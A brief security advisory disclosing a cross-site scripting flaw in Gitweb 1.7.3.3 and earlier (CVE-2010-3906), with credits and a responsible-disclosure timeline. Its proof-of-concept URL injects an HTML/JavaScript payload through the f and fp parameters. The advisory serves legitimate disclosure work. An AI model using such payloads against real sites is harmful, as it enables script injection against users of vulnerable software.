18 lines
No EOL
593 B
Text
18 lines
No EOL
593 B
Text
>-8 Description 8-<
|
|
Cross-site scripting (XSS) vulnerability in Gitweb 1.7.3.3 and previous versions
|
|
allows remote attackers to inject arbitrary web script or HTML code via f and fp variables.
|
|
|
|
>-8 Proof Of Concept 8-<
|
|
http://localhost/?p=foo/bar/ph33r.git;a=blobdiff;f=[XSS];fp=[XSS]
|
|
[XSS] => "><body onload="alert('xss')"> <a
|
|
|
|
|
|
>-8 Credits 8-<
|
|
Emanuele 'emgent' Gentili <e.gentili@tigersecurity.it>
|
|
|
|
|
|
>-8 Responsible Disclosure 8-<
|
|
|
|
13-12-2010 Initial contact with upstream and vendor-sec
|
|
13-12-2010 Vendor Response and CVE-2010-3906 assignation
|
|
15-12-2010 Public Disclosure |